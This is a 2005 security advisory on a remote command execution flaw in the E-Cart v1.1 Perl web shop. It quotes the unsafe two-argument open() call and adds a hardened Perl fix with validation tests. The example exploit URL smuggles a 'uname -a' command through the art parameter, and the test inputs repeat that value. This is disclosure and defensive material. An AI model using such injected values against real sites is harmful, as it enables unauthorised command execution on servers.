E-Cart version 1.1 remote command execution exploit.
575b7215f959d66769b1032e70023be88c3fe7affcae81a5810a504a97e4be9b
============================================================
Title: E-Cart v1.1 Remote Command Execution
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 20/04/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: <= E-Cart 2004 v1.1
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi
============================================================

============================================================
*Summary
E-Cart is a mod for WebAPP, written in Perl. It is a web shop.
============================================================
*Problem Description:
The bug is in the file index.cgi, where the variable art is interpolated
into the path passed to "open()" without any validation of its contents.
Because Perl's two-argument open() treats a name ending in "|" as a command
to run, an attacker can execute arbitrary commands.
Vulnerable code
---------------
sub viewart {
    &cartfooter;
    open(DATA, "$catdir/$info{'cat'}/$info{'art'}");
    hold(DATA);
    chomp(@data = <DATA>);
    release(DATA);
    close(DATA);
...
...
...
============================================================
*Example:
http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|
============================================================
*Fix:
Contact the Vendor.
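
A hardened form of the open() call in viewart, as an added example that is not E-Cart or vendor code: it validates cat and art as single path components and uses three-argument open(), which never interprets "|" as a pipe. The names safe_component and read_article and the sample catalogue are assumptions; the hold()/release() locking calls from the original are omitted.

```perl
#!/usr/bin/perl
# Added example (not E-Cart code): safe replacement for the open() in viewart.
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Path qw(make_path);

# Hypothetical helper: accept one path component only. Rejects "/", "|",
# whitespace, "..", a leading dot, and anything else outside the allow-list.
sub safe_component {
    my ($v) = @_;
    return defined $v && $v =~ /\A[A-Za-z0-9_-]+(?:\.[A-Za-z0-9_-]+)*\z/;
}

# Returns a reference to the article's lines, or undef if the input is
# rejected or the file cannot be read.
sub read_article {
    my ($catdir, $cat, $art) = @_;
    return unless safe_component($cat) && safe_component($art);
    # Three-argument open: '<' fixes the mode, so the path is only ever a
    # filename. A leading or trailing "|" is never treated as a command.
    open(my $fh, '<', "$catdir/$cat/$art") or return;
    chomp(my @data = <$fh>);
    close($fh);
    return \@data;
}

# Constructed sample catalogue in a temporary directory.
my $catdir = tempdir(CLEANUP => 1);
make_path("$catdir/reproductores_dvd");
open(my $out, '>', "$catdir/reproductores_dvd/reproductordvp-ns315.dat") or die $!;
print {$out} "DVD player\n199\n";
close($out);

# Parameter values as they would arrive after CGI URL-decoding (constructed).
my @requests = (
    ['reproductores_dvd', 'reproductordvp-ns315.dat'],            # legitimate
    ['reproductores_dvd', 'reproductordvp-ns315.dat|uname -a|'],  # value from the advisory
    ['..',                'reproductordvp-ns315.dat'],            # directory traversal
);
for my $r (@requests) {
    my $data = read_article($catdir, @$r);
    printf "%-55s %s\n", "$r->[0]/$r->[1]",
        $data ? 'ok: ' . scalar(@$data) . ' line(s)' : 'rejected';
}
```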
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar
-- 
Iñaki Cormenzana
SoulBlack's Staff
Y3VhbmRvIHRlbmVtb3MgZWwgbWljcvNmb25vLCB0ZW5lbW9zIHNvdWwuLi4=